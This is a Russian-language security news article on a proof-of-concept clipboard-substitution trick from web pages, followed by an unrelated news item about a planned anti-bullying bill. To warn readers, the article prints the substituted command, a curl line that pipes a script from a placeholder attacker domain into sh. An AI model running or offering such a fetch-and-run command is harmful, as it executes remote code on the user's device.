Эксперт показал подмену скопированной на веб-странице команды

Эксперт показал подмену скопированной на веб-странице команды

Ряд программистов, системных администраторов и исследователей привыкли копировать определённые куски кода на веб-страницах, а затем вставлять их, например, в консоль или терминал. Как оказалось, это пагубная практика, которая может привести к негативным для устройства последствиям.

Габриэль Фридлендер, основатель платформы для обучения основам кибербезопасности — Wizer, показал очевидный, но при этом интересный приём, который заставит по-новому взглянуть на процесс копирования-вставки с веб-страниц.

Суть в том, что при копировании страница может незаметно подменить содержимое буфера обмена, что приведёт к использованию совершенно другой команды на устройстве пользователя. Поскольку как новички, так и уже опытные сисадмины привыкли иногда «копипастить» код (характерный пример — со StackOverflow), будет полезно помнить про описанную Фридлендером технику.

Специалист даже опубликовал в блоге тривиальный демонстрационный код (proof-of-concept, PoC) и просит читателей попробовать скопировать простейшую команду, с которой знакомо подавляющее большинство системных администраторов:

 

После вставки скопированной команды в любой текстовый редактор пользователь увидит совершенно другое:

curl http://attacker-domain:8000/shell.sh | sh

Примечательно, что при вставке этой команды в терминал Linux она моментально выполнится, что создаёт ещё больший риск, ведь пользователь даже не успеет проверить корректность введённых данных.

Как пояснил Фридлендер, суть трюка кроется в JavaScript-коде, размещённом на демонстрационной странице:

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

До конца года в Госдуму внесут законопроект о профилактике буллинга

Председатель думского комитета по молодежной политике Госдумы Артем Метелев анонсировал внесение законопроекта о профилактике буллинга, в том числе кибербуллинга.

Как сообщил глава профильного комитета ТАСС, документ уже проходит согласование в органах исполнительной власти. По оценкам Артема Метелева, данный законопроект будет внесен до конца года.

Прежде всего, в документе появится определение буллинга. Школы и иные образовательные учреждения будут обязаны уведомлять правоохранительные органы о соответствующих проявлениях.

Кроме того, вводится ответственность для организаторов травли и меры по их исправлению.

В случае кибербуллинга, когда для травли используются интернет-платформы, законопроект предлагает администрации соцсетей выявлять соответствующий контент и блокировать как его распространение, так и активность тех пользователей, которые его размещают и распространяют.

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru